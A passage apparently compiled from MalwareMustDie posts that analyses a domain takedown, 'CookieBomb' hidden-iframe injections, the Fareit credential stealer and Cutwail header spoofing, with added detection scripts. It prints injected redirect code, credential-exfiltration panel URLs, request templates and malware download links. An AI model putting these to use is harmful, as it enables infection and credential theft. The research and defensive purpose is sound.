2013-06-27 15:01:50 2 / 9 h00p://terminalspervasive.biz/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 14:53:14 2 / 14 h00p://samenamedpremium.biz/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 14:11:13 2 / 49 h00p://samenamedpremium.biz/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 14:05:27 2 / 54 h00p://samenamedpremium.biz/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 13:08:19 2 / 26 h00p://recentlyusedclings.com/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 10:35:34 2 / 7 h00p://terminalspervasive.biz/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 09:50:03 2 / 7 h00p://terminalspervasive.biz/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 07:08:47 2 / 47 h00p://recentlyusedclings.com/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-27 01:58:39 2 / 26 h00p://toagreements.net/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-26 22:00:39 0 / 0 h00p://samenamedpremium.biz [Russian Federation] 80.78.247.114
2013-06-26 21:28:24 2 / 24 h00p://toagreements.net/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-26 20:50:53 0 / 2 h00p://samenamedpremium.biz/closest/i9jfuhioejskveohnuojfir.php?jnlp=0c443e4262 [Russian Federation] 80.78.247.114
2013-06-26 13:57:32 0 / 0 h00p://samenamedpremium.biz [Russian Federation] 80.78.247.114
2013-06-26 13:56:00 0 / 0 h00p://80.78.247.114 [Russian Federation] 80.78.247.114
2013-06-26 04:38:23 0 / 0 h00p://80.78.247.114 [Russian Federation] 80.78.247.114
2013-06-26 04:00:06 2 / 50 h00p://explanationanonymized.in/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-26 03:08:24 2 / 24 h00p://explanationanonymized.in/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-26 00:21:59 2 / 10 h00p://platformvillains.in/closest/hospital-worker.php [Russian Federation] 80.78.247.114
2013-06-25 23:52:36 2 / 14 h00p://platformvillains.in/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-25 23:44:57 2 / 23 h00p://platformvillains.in/closest/hospital-worker.php [Russian Federation] 80.78.247.114
2013-06-25 23:28:58 2 / 25 h00p://platformvillains.in/closest/hospital-worker.php [Russian Federation] 80.78.247.114
2013-06-25 22:00:33 2 / 7 h00p://platformvillains.in/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-25 21:29:13 2 / 9 h00p://platformvillains.in/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-25 21:27:52 1 / 0 h00p://platformvillains.in/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-25 18:14:20 2 / 11 h00p://appsandfundamentals.in/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
2013-06-25 18:02:07 1 / 0 h00p://appsandfundamentals.in/closest/i9jfuhioejskveohnuojfir.php [Russian Federation] 80.78.247.114
"

Exploit Attack Evidence

Some snapshots of the exploit infector used:

This is evidence as recorded in the URLQuery records below:

"http://urlquery.net/report.php?id=3356618
http://urlquery.net/report.php?id=3356579
http://urlquery.net/report.php?id=3355901
http://urlquery.net/report.php?id=3352167
http://urlquery.net/report.php?id=3332078
:"

Tango Information

Dismantling detail: although 150+ domains were spotted under various conditions, registered by the same bad actor behind this scheme, we sorted them down to the 61 unique domains listed below, which will be enough to put the related infection off the internet. Sorting proceeded by eliminating the double records, usage of sub-domains, and domains not clearly related/verdicted. These domains are confirmed down as of June 28th, 2013, 23:59(pm) GMT+9. The registrant's individual ID/credentials used are marked and spread to all registrars as a blacklist for further threat blocking, and also passed to the regional authority for the further legal process.

The suspended malware related domain list is as per below:

"anotherfactory.biz
artificialwind.asia
automatedpersonal.biz
balloonmansards.biz
blissfullyshare.biz
builtinscrupulous.net
campgroundstexts.biz
challengingprobably.biz
cokelendino.biz
conceptuallynetra.biz
coveringtelex.org
crypticallyhits.biz
delacruse.biz
directorybasedvibration.biz
discontiguousnds.asia
enterprisespumpkin.biz
eulaschalk.biz
examplefeatures.biz
expressionssentrybay.biz
extensivemymagicjackcom.org
fingertipsync.biz
flagsreimagining.biz
forgotperson.biz
fourthdvst.org
garbleddesigns.net
hoodselectable.biz
hourswebdav.biz
humorannouncement.biz
illustrateredeemed.net
joliclouddestructive.net
klockspell.biz
laptophandextremely.biz
lookyouthful.biz
massacrehighesttiered.biz
mediumsizedacdsees.biz
metadataconverse.net
muckinghighres.net
normov.biz
ntjobs.biz
nutsprerelease.biz
obamanizererouting.biz
perdevicecategoryyoursphere.net
pkielements.biz
prohibitedhill.biz
ridspayback.asia
scriptedbecome.biz
smugmugextras.biz
snapfishletnarrator.biz
sparesaddressmanually.biz
specialtyinterpreted.biz
squirrelspremade.biz
staffsenjoyment.biz
subsystemgandhi.biz
subtractionipvcertified.biz
summarysomeplace.biz
technologiesblipping.biz
votingkasperskyequipped.biz
vsmounting.org
webcastingtyping.biz
webworkzoneibm.biz
withinstyrofoam.biz"

Public announcement by #MalwareMustDie.NPO.,All rights reserved.
Anti CyberCrime Research Group - malwaremustdie.org

Proof of Concept of "CookieBomb" code injection attack


This writing is actually related to the previously blogged: "A mistery of Malware URL "cnt.php" Redirection" here-->>[MMD-Blog], so I warn you.. this is not new stuff, but it seems a bit difficult to make some admins act quickly on the IR of this incident, so me and my fellow coder friend in our group tried to explain how dangerous this threat can be in PoC details.

Accidentally I just handled a rush of malicious JavaScript code injections of similar cases (without involving htaccess), and this evil code was injected into the HTML files, which mostly are index files, with the code as per below:

This is why I have a huge number of samples of this injection code for research purposes.

So I collected the latest 30+ codes, which I attached in the sample section for cross-analysis purposes for fellow researchers (I put a different password on this share; DM me on twitter for it):

These codes were injected into the index files via FTP accounts (in all cases I handled) that were leaked/stolen, suspected to be from malware infection or FTP brute-forcing, or possibly by "other" vulnerabilities (which I can not say out loud yet, a different issue), with the log (thanks to the great admin who shared this) suggesting the same auto-injection FTP tool as previously blogged:

[2013/07/11 21:46:55] xxxxxxxx ATTACKER-IP: C="USER xxxxxxxx" B=- S=331
[2013/07/11 21:46:55] xxxxxxxx ATTACKER-IP: C="PASS (hidden)" B=- S=230
[2013/07/11 21:46:55] xxxxxxxx ATTACKER-IP: C="SYST" B=- S=215
[2013/07/11 21:46:55] xxxxxxxx ATTACKER-IP: C="LIST /" D= B=211 S=226
[2013/07/11 21:46:56] xxxxxxxx ATTACKER-IP: C="LIST public_html/" D= B=630 S=226
[2013/07/11 21:46:56] xxxxxxxx ATTACKER-IP: C="LIST public_html/data/" D= B=124 S=226
[2013/07/11 21:46:57] xxxxxxxx ATTACKER-IP: C="LIST public_html/images/" D= B=1219 S=226
[2013/07/11 21:46:57] xxxxxxxx ATTACKER-IP: C="STOR public_html//KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/07/11 21:46:57] xxxxxxxx ATTACKER-IP: C="STOR public_html/cgi-bin/KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/07/11 21:46:58] xxxxxxxx ATTACKER-IP: C="STOR public_html/data/KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/07/11 21:46:58] xxxxxxxx ATTACKER-IP: C="STOR public_html/images/KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/07/11 21:46:58] xxxxxxxx ATTACKER-IP: C="RETR public_html//index.html" F=/public_html/index.html B=10486 S=226 T=0.199
[2013/07/11 21:46:59] xxxxxxxx ATTACKER-IP: C="STOR public_html//index.html" F=- B=- S=- T=-
[2013/07/11 21:46:59] xxxxxxxx ATTACKER-IP: C="RETR public_html/index.html" F=- B=- S=550 T=-
[2013/07/11 21:47:00] xxxxxxxx ATTACKER-IP: C="RETR public_html/index.html-1" F=/public_html/index.html-1 B=7484 S=226 T=0.189
[2013/07/11 21:47:00] xxxxxxxx ATTACKER-IP: C="STOR public_html/index.html-1" F=- B=- S=- T=-
Webroot wrote good articles about these evil tools, which were spotted used in the wild, in -->>[HERE] and [HERE]
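As an added example (not part of the post, nor of the tools Webroot describes), the following parses the log lines above and flags the two things that make this session look like the auto-injection tool rather than a human: an index file being RETR'ed and STOR'ed back under the same path within a second or two, and the same file name being STOR'ed into several directories in a row. The log layout it assumes (timestamp, account, client, C="command", then key=value fields with S= the FTP reply code) is read off the lines above; anything beyond that about the field meanings is an assumption.

```javascript
// Added example (not part of the MMD post or any tool it names): parse the FTP transfer
// log quoted above and flag the two behaviours of the auto-injection tool it shows.
// The log lines are copied from the post; the layout assumed is
//   [YYYY/MM/DD HH:MM:SS] <account> <client>: C="<CMD> <arg>" <K>=<v> ...
// where S= is the FTP reply code (552 = exceeded storage allocation, 550 = file unavailable).
const SAMPLE_LOG = `[2013/07/11 21:46:55] xxxxxxxx ATTACKER-IP: C="USER xxxxxxxx" B=- S=331
[2013/07/11 21:46:55] xxxxxxxx ATTACKER-IP: C="PASS (hidden)" B=- S=230
[2013/07/11 21:46:55] xxxxxxxx ATTACKER-IP: C="SYST" B=- S=215
[2013/07/11 21:46:55] xxxxxxxx ATTACKER-IP: C="LIST /" D= B=211 S=226
[2013/07/11 21:46:56] xxxxxxxx ATTACKER-IP: C="LIST public_html/" D= B=630 S=226
[2013/07/11 21:46:56] xxxxxxxx ATTACKER-IP: C="LIST public_html/data/" D= B=124 S=226
[2013/07/11 21:46:57] xxxxxxxx ATTACKER-IP: C="LIST public_html/images/" D= B=1219 S=226
[2013/07/11 21:46:57] xxxxxxxx ATTACKER-IP: C="STOR public_html//KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/07/11 21:46:57] xxxxxxxx ATTACKER-IP: C="STOR public_html/cgi-bin/KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/07/11 21:46:58] xxxxxxxx ATTACKER-IP: C="STOR public_html/data/KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/07/11 21:46:58] xxxxxxxx ATTACKER-IP: C="STOR public_html/images/KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/07/11 21:46:58] xxxxxxxx ATTACKER-IP: C="RETR public_html//index.html" F=/public_html/index.html B=10486 S=226 T=0.199
[2013/07/11 21:46:59] xxxxxxxx ATTACKER-IP: C="STOR public_html//index.html" F=- B=- S=- T=-
[2013/07/11 21:46:59] xxxxxxxx ATTACKER-IP: C="RETR public_html/index.html" F=- B=- S=550 T=-
[2013/07/11 21:47:00] xxxxxxxx ATTACKER-IP: C="RETR public_html/index.html-1" F=/public_html/index.html-1 B=7484 S=226 T=0.189
[2013/07/11 21:47:00] xxxxxxxx ATTACKER-IP: C="STOR public_html/index.html-1" F=- B=- S=- T=-`;

const LINE_RE = /^\[(\d{4})\/(\d{2})\/(\d{2}) (\d{2}):(\d{2}):(\d{2})\] (\S+) (\S+): C="([A-Z]+)(?: ([^"]*))?"(.*)$/;

// One log line -> { time (epoch seconds), account, client, cmd, path, fields }; null if it does not match.
function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  const [, y, mo, d, h, mi, s, account, client, cmd, arg, rest] = m;
  const fields = {};
  for (const kv of rest.matchAll(/(\w)=(\S*)/g)) fields[kv[1]] = kv[2];
  return {
    time: Date.UTC(+y, +mo - 1, +d, +h, +mi, +s) / 1000,
    account, client, cmd,
    path: arg ? arg.replace(/\/+/g, '/') : '',   // "public_html//index.html" and "public_html/index.html" are one file
    fields,
  };
}

function parseLog(text) {
  return text.split('\n').map(parseLine).filter(Boolean);
}

// Pattern 1: a file is downloaded (RETR) and re-uploaded (STOR) under the same path within
// windowSec seconds by the same account/client, i.e. an automated read-modify-write of a page.
function findReadModifyWrite(entries, windowSec) {
  const lastRetr = new Map();
  const hits = [];
  for (const e of entries) {
    const key = e.account + '|' + e.client + '|' + e.path;
    if (e.cmd === 'RETR') {
      lastRetr.set(key, e.time);
    } else if (e.cmd === 'STOR' && lastRetr.has(key)) {
      const deltaSec = e.time - lastRetr.get(key);
      if (deltaSec <= windowSec) hits.push({ path: e.path, deltaSec, uploadStatus: e.fields.S });
      lastRetr.delete(key);
    }
  }
  return hits;
}

// Pattern 2: the same file name is STORed into at least minDirs directories in one session
// (a dropper spraying its payload); the per-directory reply codes say whether each upload stuck.
function findBasenameSpray(entries, minDirs) {
  const byName = new Map();
  for (const e of entries) {
    if (e.cmd !== 'STOR') continue;
    const i = e.path.lastIndexOf('/');
    const name = e.path.slice(i + 1), dir = e.path.slice(0, Math.max(i, 0));
    if (!byName.has(name)) byName.set(name, new Map());
    byName.get(name).set(dir, e.fields.S);
  }
  const out = [];
  for (const [name, dirs] of byName) {
    if (dirs.size >= minDirs) out.push({ name, dirs: [...dirs.keys()], statuses: [...dirs.values()] });
  }
  return out;
}

if (typeof require !== 'undefined' && require.main === module) {
  const entries = parseLog(SAMPLE_LOG);
  console.log(findReadModifyWrite(entries, 5));   // index.html (1s) and index.html-1 (0s)
  console.log(findBasenameSpray(entries, 3));     // KJQb9RkC.gif into 4 directories, all S=552
}
```

On this log the .gif drops all came back with reply 552 (the account's storage quota refused them), while the two index rewrites have `S=-`, so the server recorded no reply for the uploads that actually mattered; a detection that only keys on successful transfers would miss exactly this session, which is why both functions look at the command sequence and timing rather than the status alone.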

Let's go back to those injected codes. After decoding, all of these scripts came up with the below code; I put some explanation on the codes to share the same perception for the further explanation:

The decoded values of the redirection stored in the RANDOM_2_TO_4_CHARS are as per below
(in "masked" URLs):

xp.src =    'h00p://valtechnologie.com/support/clik.php';
rr.src = 'h00p://toerkoopweb.nl/diensten/count.php';
p.src = 'h00p://abra-pc.com.br/clik.php';
wenr.src = 'h00p://ueno-hiroshima.main.jp/dtd.php';
nj.src = 'h00p://coleychurch.org.uk/www/cnt.php';
c.src = 'h00p://101.110.149.203/clk.php';
y.src = 'h00p://dv-suedpfalz.de/count.php';
kk.src = 'h00p://spendmetest.com/Services/count.php';
fkhd.src = 'h00p://syasinya-san.sakura.ne.jp/dtd.php';
gvb.src = 'h00p://turbolinks.orgfree.com/documentation/cnt.php';
qbvmf.src = 'h00p://taekwondoarirang.com/clik.php';
sfv.src = 'h00p://igrejabatista.comze.com/web_media/counter.php';
idqni.src = 'h00p://www.alle-vier.de/clicker.php';
ydypy.src = 'h00p://igrejabatista.comze.com/web_media/counter.php';
vaasr.src = 'h00p://www.thehornybanana.com/_vti_bin/clicker.php';
gvb.src = 'h00p://turbolinks.orgfree.com/documentation/cnt.php';
gvb.src = 'h00p://turbolinks.orgfree.com/documentation/cnt.php';
qbvmf.src = 'h00p://taekwondoarirang.com/clik.php';
dxbq.src = 'h00p://f2f365.com/counter.php';
qbvmf.src = 'h00p://taekwondoarirang.com/clik.php';
beb.src = 'h00p://avceldiamante.com/clk.php';
wenr.src = 'h00p://ueno-hiroshima.main.jp/dtd.php';
kmqai.src = 'h00p://96.9.52.103/clik.php';
kk.src = 'h00p://spendmetest.com/Services/count.php';
jpp.src = 'h00p://xeropointventures.com/images/rel.php';
nj.src = 'h00p://coleychurch.org.uk/www/cnt.php';
ve.src = 'h00p://alldesign-jp.fool.jp/counter.php';
ydypy.src = 'h00p://igrejabatista.comze.com/web_media/counter.php';
jpp.src = 'h00p://xeropointventures.com/images/rel.php';
udv.src = 'h00p://ueno-hiroshima.main.jp/dtd.php';
So we have the evil PHP file names used as the landing of this redirection: cnt.php, clk.php, click.php, rel.php, dtd.php, counter.php, clicker.php, and so on. The purpose of this file naming is to camouflage the malicious action from the hacked site owners and the infected victims. The problem is that if you access this URL directly, it replies to you with "OK" or other dull values.

So far, while pointing out and cleaning these infections, even though I begged site admins and owners for the server-side code behind the landing page, I was not lucky enough to obtain those scripts; however, we finally understand this malicious concept.

The concept of Cookie Bomb

I called and tagged this the #CookieBomb concept; it works like this:

The code in the template above means: when a cookie-enabled browser accesses one of these infected sites, the code runs in the JavaScript environment to check whether your browser already has a specific cookie with a specific value; if not, that cookie is created for you. At the same time, whether you have the cookie or not, you are redirected to another site via a hidden IFRAME, which replies with a dull response like the one in the picture below:

During the creation of the cookie, specific values are set: 1) the cookie's (file) name, 2) a special variable value, 3) the expiry date, and 4) the access path. These are the four important values needed for the further process.

After the redirection is made, the PHP (or Java, etc.) script, masked as those cnt.php, clk.php, click.php, rel.php, dtd.php, counter.php, clicker.php and so on, is supposed to check the cookie's values and other conditions, and then execute an "action" once those conditions are met; this "action" is never a good one. It can be another redirection or a straight infection, depending on the hacker's needs. It is a simple scheme, it works, and it can be deployed in a mass automation scheme.

The point of the bad guys doing this is to delay an infection and to avoid detection and alerts. In other words: this time you need a cookie, valid until some expiry time, as the "ticket" for an infection, and that is why I call this Cookie Bomb.
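As an added example (my own code, not the post's PoC and not anything from the attackers' kit), here is a small Python heuristic that checks an already decoded injection for the CookieBomb shape described above: a cookie written with an expiry and path=/, plus a hidden IFRAME, or one whose src ends in one of the camouflaged landing names listed above. The decoded fragment it runs on is constructed for this example; the host name in it is a placeholder, not a real infected site, and the benign fragment is constructed too.

```python
import re
from urllib.parse import urlsplit

# Camouflage file names the post lists for the cookie-checking landing script.
LANDING_NAMES = {"cnt.php", "clk.php", "clik.php", "click.php", "rel.php",
                 "dtd.php", "counter.php", "count.php", "clicker.php"}

# Real schemes plus the masked h00p:// and hxxp:// spellings used in reports.
_URL = r"""(?:https?|h00ps?|hxxps?)://[^\s"'<>]+"""
# "document.cookie = ..." as an assignment (not the == comparison), to end of line.
_COOKIE_STMT = re.compile(r"document\.cookie\s*=(?!=)\s*(?P<stmt>[^\n]*)", re.I)
_COOKIE_NAME = re.compile(r"""["'](?P<name>[A-Za-z0-9_]+)=""")
# src written either as an <iframe src=...> attribute or as an element .src property.
_IFRAME_SRC = re.compile(r"""(?:<iframe[^>]*\bsrc\s*=\s*|\.src\s*=\s*)["'](?P<url>""" + _URL + ")", re.I)
# Typical ways of keeping the frame out of sight: hidden, display:none, tiny size.
_HIDDEN = re.compile(r"""visibility\s*[:=]\s*["']?\s*hidden|display\s*[:=]\s*["']?\s*none"""
                     r"""|\b(?:width|height)\s*=\s*["']?\s*\d{1,2}\b""", re.I)

def scan_cookie_bomb(decoded):
    """Heuristic check of an already de-obfuscated script/HTML fragment for the
    CookieBomb shape: a cookie written with an expiry and path=/ together with
    a hidden IFRAME, or one whose src is a camouflaged landing script."""
    cookies = []
    for m in _COOKIE_STMT.finditer(decoded):
        stmt = m.group("stmt")
        name = _COOKIE_NAME.search(stmt)
        cookies.append({
            "name": name.group("name") if name else None,
            "has_expiry": "expires=" in stmt.lower(),
            # path=/ not followed by a further path character, i.e. the site root
            "path_root": re.search(r"path=/(?![\w.\-])", stmt) is not None,
        })
    iframe_urls = [m.group("url") for m in _IFRAME_SRC.finditer(decoded)]
    landing_hits = [u for u in iframe_urls
                    if urlsplit(u).path.rsplit("/", 1)[-1].lower() in LANDING_NAMES]
    hidden = _HIDDEN.search(decoded) is not None
    verdict = (any(c["path_root"] for c in cookies) and bool(iframe_urls)
               and (hidden or bool(landing_hits)))
    return {"cookies": cookies, "iframe_urls": iframe_urls,
            "landing_hits": landing_hits, "hidden_frame": hidden, "cookie_bomb": verdict}

# Constructed decoded fragment in the shape the post describes (placeholder host, not a real sample).
SAMPLE_DECODED_INJECTION = """
if (document.cookie.indexOf("visited_uq=55") == -1) {
  var e = new Date(); e.setDate(e.getDate() + 1);
  document.cookie = "visited_uq=55; expires=" + e.toGMTString() + "; path=/";
  var rr = document.createElement("iframe");
  rr.src = "h00p://compromised-host.example/diensten/count.php";
  rr.style.visibility = "hidden"; rr.width = "10"; rr.height = "10";
  document.body.appendChild(rr);
}
"""

# Constructed benign fragment: a consent cookie and a normal, visible embedded video.
SAMPLE_BENIGN_PAGE = """
document.cookie = "consent=1; expires=Tue, 31 Dec 2013 23:59:59 GMT; path=/";
<iframe src="https://video.example/embed/abc123" width="560" height="315"></iframe>
"""

if __name__ == "__main__":
    print(scan_cookie_bomb(SAMPLE_DECODED_INJECTION))
    print(scan_cookie_bomb(SAMPLE_BENIGN_PAGE))
```

The verdict deliberately needs the cookie and the frame together: a consent cookie with path=/ on its own, or a normal visible embed, does not fire. The iframe URLs are reported either way, because the destination site is the second host that needs cleaning.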

Proof Of Concept

Well, talking is easy and proving it is another matter, so we tried to make as many PoCs of the above infection concept as we could, and it works with the simple PHP code below:

Explanation:
The above PoC code is just an example. If the landing page reads the cookie and it meets the same condition as the cookie value previously set by the injected code on the hacked site, then the malware infection or another attack can be performed. In the example I wrote a direct access to an executable malware file; many implementations of this concept can be applied.

Mitigation

To mitigate this infection case, we can search Google for the keywords below (which can be changed easily by the hackers.. so please be flexible in your greps by using regex):

Or scan your web site for it from the local server. And if you find it, please decode it to find the destination URL target too, for both sites need to be cleaned from our beloved internet.
Furthermore, to fight this threat, the FTP log is really our friend, for we need to know from which IP address the attack came; in my case it mostly came from Ukrainian networks.

How to search this infection?

By understanding the characteristics used by this attack, it is not that difficult to search for infected pages. Google Search or Mr. Keith Makan's GooDork are very good tools for this purpose. Look at the automation logic used to infect: seeing (1) the cookie's path value of "/" and (2) the FTP hack log shown above, we know that mostly the top pages (or the files linked from the top pages, like framed top/menu pages or called scripts/CSS) are aimed at, for the reason that these bad actors target the widest infection. We can just grep for the infection string used (look at one of the pictures above), aim your dork cannon at your target (ISP or country based on Geo-IP), and you will get the result almost instantly. For instance, while writing this I was aiming at the US ISP GoDaddy and received the infected domains below, which are proven infected by this attack:

h00p://mmcmt.org/
h00p://www.wettndry.com/
h00p://gorillarobotfactory.com/
h00p://dcprevisores.com/
h00p://ip-72-167-99-107.ip.secureserver.net/
h00p://syccoservices.com/
h00p://cdijescolhacerta.casabmse.pt/
h00p://www.iimspublications.com/
h00p://www.shaversandrazor.com/
h00p://www.newlooklaser.ca/
h00p://www.smartageinsurance.com/
h00p://www.jumpshotmedia.com/
h00p://www.wolfetech.com/
h00p://bracapulco.com/
h00p://www.naturalbalancenow.com/
h00p://www.ishojtv.com/
h00p://www.sensorsadvance.com/
h00p://www.newlooklaser.ca/
h00p://bracapulco.com/
h00p://mosaicnarrative.com/
h00p://westonflmovers.com/
h00p://www.1stpagemarketingservices.com/
h00p://2528c.com/
h00p://starlighthca.com/
h00p://billymorganart.com/
h00p://flyxilla.com/
h00p://thinkingknowledge.com/
h00p://www.angelavanegas.com/
h00p://sportingdelights.com/
h00p://scholarlythinking.com/
h00p://limeworks.org/blog/wp-includes/js/comment-repl%3D/
[...]
(some of ↑these may lead to Blackhole Exploit Kit, all are infected w/redir)

Samples

We share the sample injection codes, the decoded version and the PoC for download from-->>[HERE], for research purposes and to raise the detection ratio of this attack.

Additional

Recent changes in the obfuscation (or other changes) of this attack will be posted on this page-->>[Blog]

This post is dedicated to fellow admins and fellow IR officers who have to work non-stop to clean this threat, and special thanks to our crusader for his great help in proving the concept.

#MalwareMustDie!

How bad the Cutwail and other SpamBot can fool (spoof) us?

As the title says, the answer is VERY bad and nasty. I took my bitter pill by analyzing this case; it is important to share this information since there is very little of it on the internet, so I dare myself to write up this analysis experience.

Yesterday we came across a spam malvertisement of a login credential stealer (Trojan Win32/Fareit) which looks like it was sent from an infected PC in a local network of the US Department of Defense, and also looks relayed via their email server. Below is the snapshot of the email:

And this is the header written for relaying this malvertisement:

You can see it is a common malware campaign spam: inside the ZIP file there is an executable PE file which is actually a Trojan Win32/Fareit, a stealer of FTP, FileZilla, browser, remote directory, email and Facebook login credentials.

The distributed Trojan: Win32/Fareit

Well, to be brief, the trojan itself runs as per the video below, downloads two Zeus variant malware files from a remote host, sends our grabbed login data to a remote credential panel (we call it a gate) URL, and in the end makes our PC a part of the Zeus botnet.

Below is some evidence I grabbed; the panel URLs the credentials are sent to:

h00p://nursenextdoor.com:443/ponyb/gate.php
h00p://dreamonseniorswish.org:443/ponyb/gate.php
h00p://prospexleads.com:8080/ponyb/gate.php
h00p://phonebillssuck.com:8080/ponyb/gate.php
The POST request template used to send the credentials:
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)
POST %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: %lu
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: %s
Content-Length:
Location:
The encoded posted traffic contains credentials:

The URLs of the other malware files downloaded (ZeuS/Zbot):
h00p://www.lavetrinadeidesideri.it/Twe.exe
h00p://ftp.aquasarnami.com/zKo.exe
And the HTTP request template it used to download them:
GET %s HTTP/1.0
Host: %s
Accept-Language: en-US
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: %s
PoC of the downloaded Zeus:

And they are saved here by Win32/Fareit:

↑These are Zeus malware alright. I was confused a bit between the spambot and FakeAV, but thanks to Xylit0l and another friend who reminded me to recheck.

The overall samples and their detection ratio in VT (click the MD5) are here:



2013/07/17 18:44 158,720 c7e5b822101343c1a4d8a2297a1a7d40 CommBank_Docs_18072013.exe
2013/07/18 19:18 205,824 1427015ba8d9736e6329ea0444bb300c Twe.exe
2013/07/18 20:01 315,392 0ac084b9fa597c74ea1260ed054b126e zKo.exe

I wrote a deeper analysis of the attached malware, which can be viewed here-->>[KernelMode]

How far can they spoof?

Excluding the rogue contents used in the email, it is a common practice of these scammers to spoof: (1) the sender's email address, (2) the email's message ID, (3) the mail client information, or even (4) a fake MIME version in the header (these are marked with red numbers in the picture below).

Note: they can fake "almost" everything, even the character set used (see the blue part); see the following explanation for the details.

If we look at the email routing headers used in this spam, it seems the email was relayed two times before it came to my honeypot address. Let's look at the routing information, which I marked in the picture above with purple highlighting. The first relay (the lower part) looks like a client in a local network with the IP mask 192.168.8.0/24 sending this email to the MTA of the network it reached, in this case 143.214.203.103, which relays this spam to another remote MTA at 69.199.182.82, which then relays it to my honeypot mail server and my address.

So what does a Unix admin or engineer think after seeing this? Oh, it looks like some malware infected a client behind 143.214.203.103, and after checking further, the IP 143.214.203.103 is in the US DoD's network:

OK, this was a shock and a fact I found hard to believe myself, so I tweeted it as per below:

And got no response to deny this, UNTIL...

A fellow researcher (thanks to @snixerxero) contacted me about the possibility that those email routing headers were spoofed. After looking back at the header and the way it is written, I replied "No way, looks real to me, you must be wrong!", and he came back with the related template of the Cutwail spambot (reference for Cutwail is here -->>[LINK]) as a PoC (with many thanks), as pasted below:


Received: from [{NUMBER[1-2]}{NUMBER[0-5]}{NUMBER[0-5]}.{NUMBER[1-2]}{NUMBER[0-5]}
{NUMBER[0-5]}.{NUMBER[1-2]}{NUMBER[0-5]}{NUMBER[0-5]}.{NUMBER[1-2]}{NUMBER[0-5]}
{NUMBER[0-5]}] (port={NUMBER[1-9]}{DIGIT[1]}{DIGIT[1]}{DIGIT[1]}{DIGIT[1]}
helo=[192.168.{DIGIT[1]}.{DIGIT[1]}{DIGIT[1]}]) by {BOT_IP} with asmtp id
1rqLaL-000{SYMBOL[1]}{SYMBOL[1]}-00 for {MAILTO_USERNAME}@{MAILTO_DOMAIN}; {DATE}
Surprisingly, THIS template matches well with the values of the DoD header routing data below:
Received: from [143.214.203.103] (port=30877 helo=[192.168.8.11]) by 69.199.182.82 with
asmtp id 1rqLaL-0002D-00 for xxx@xxx; Wed, 17 Jul 2013 15:26:40 -0500
This information also breaks down the template code, as per the details below:

1. The spoofed IP address template:

{NUMBER[1-2]}{NUMBER[0-5]}{NUMBER[0-5]}.{NUMBER[1-2]}{NUMBER[0-5]}{NUMBER[0-5]}.{NUMBER[1-2]}{NUMBER[0-5]}{NUMBER[0-5]}.{NUMBER[1-2]}{NUMBER[0-5]}{NUMBER[0-5]}
Note the REGEX-like value ranges used.

2. The port number template (format):

{NUMBER[1-9]}{DIGIT[1]}{DIGIT[1]}{DIGIT[1]}{DIGIT[1]}
As with the IP template, note that the number is built digit by digit; a good hint when reversing.

3. We come to the most important part, the way this spambot fakes the email relay log ID with the template below:

by {BOT_IP} with asmtp id 1rqLaL-000{SYMBOL[1]}{SYMBOL[1]}-00 for 
This will print the fake relay log ID below:
by 69.199.182.82 with
asmtp id 1rqLaL-0002D-00 for xxx@xxx; Wed, 17 Jul 2013 15:26:40 -0500
This tells us that 69.199.182.82 is the ACTUAL SpamBot IP of the Cutwail, and that there was never any relay of this malvertisement through 143.214.203.103 at all.
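As an added example (my own Python, not part of the post or of any spambot's code), here is the template above turned into a matcher for Received: headers, which is what an SMTP-layer filter would do with it. The meaning of each placeholder type is my assumption, inferred from the header the post matched against it: {NUMBER[a-b]} is one digit in that range, {DIGIT[n]} is n arbitrary digits, {SYMBOL[n]} is n alphanumerics ("2D" in the sample), {BOT_IP} is the address the bot writes as its own. The second header is a constructed ordinary one, using documentation addresses, that must not match.

```python
import re

# The Cutwail "Received:" template quoted in the post, joined onto one line.
CUTWAIL_TEMPLATE = (
    "Received: from [{NUMBER[1-2]}{NUMBER[0-5]}{NUMBER[0-5]}.{NUMBER[1-2]}{NUMBER[0-5]}"
    "{NUMBER[0-5]}.{NUMBER[1-2]}{NUMBER[0-5]}{NUMBER[0-5]}.{NUMBER[1-2]}{NUMBER[0-5]}"
    "{NUMBER[0-5]}] (port={NUMBER[1-9]}{DIGIT[1]}{DIGIT[1]}{DIGIT[1]}{DIGIT[1]} "
    "helo=[192.168.{DIGIT[1]}.{DIGIT[1]}{DIGIT[1]}]) by {BOT_IP} with asmtp id "
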